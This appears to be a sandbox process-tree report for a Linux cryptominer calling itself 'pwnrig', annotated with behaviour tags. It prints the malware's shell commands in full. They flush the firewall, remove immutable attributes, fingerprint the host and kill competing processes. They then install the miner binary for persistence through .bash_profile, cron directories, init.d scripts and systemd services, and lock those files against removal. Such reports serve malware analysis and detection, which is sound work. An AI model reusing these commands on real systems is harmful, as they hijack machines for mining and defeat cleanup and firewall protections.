/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵
- Attempts to change immutable files
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵
- Attempts to change immutable files
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
- Attempts to change immutable files
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵
-
/usr/bin/bashbash -c "iptables -P INPUT ACCEPT"2⤵
-
/usr/sbin/iptablesiptables -P INPUT ACCEPT2⤵
-
/usr/bin/bashbash -c "iptables -P OUTPUT ACCEPT"2⤵
-
/usr/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵
-
/usr/bin/bashbash -c "iptables -P FORWARD ACCEPT"2⤵
-
/usr/sbin/iptablesiptables -P FORWARD ACCEPT2⤵
-
/usr/bin/bashbash -c "iptables -F"2⤵
-
/usr/sbin/iptablesiptables -F2⤵
-
/usr/bin/bashbash -c "chattr -ia /etc/ld.so.preload"2⤵
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload2⤵
-
/usr/bin/pgreppgrep -f klibsystem42⤵
- Reads CPU attributes
-
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads CPU attributes
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/crontabcrontab -r1⤵
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
-
/usr/bin/bashbash -c "echo \"* * * * * /opt/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
- Attempts to change immutable files
-
/usr/bin/whoamiwhoami3⤵
-
/usr/bin/hostnamehostname3⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
/usr/bin/psps -A "-ostat,ppid"3⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/grepgrep /etc/cron3⤵
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
-
/usr/bin/idid -u3⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵
-
/usr/bin/rmrm -rf /bin/bprofr3⤵
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
-
/usr/bin/idid -u3⤵
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
-
/usr/bin/rmrm -rf /bin/crondr3⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
-
/usr/bin/whichwhich chkconfig3⤵
-
/usr/bin/whichwhich update-rc.d3⤵
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig4⤵
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig4⤵
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig4⤵
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig4⤵
- Reads EFI boot settings
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
-
/usr/bin/rmrm -rf /bin/initdr3⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig4⤵
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig4⤵
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig4⤵
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig4⤵
- Reads EFI boot settings
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵
-
/usr/bin/whichwhich systemctl3⤵
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
-
/usr/bin/rmrm -rf /bin/sysdr3⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
-
/usr/bin/systemctlsystemctl enable pwnrige.service3⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl enable pwnrigl.service3⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads EFI boot settings
-
/usr/bin/hostnamehostname -I1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
-
/usr/bin/whoamiwhoami3⤵
-
/usr/bin/hostnamehostname3⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
-
/usr/bin/idid -u3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/grepgrep /etc/cron3⤵
-
/usr/bin/psps x3⤵
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/hostnamehostname -I1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/wcwc -l1⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵
-
/usr/bin/grepgrep -v grep1⤵
-
/usr/bin/psps aux1⤵
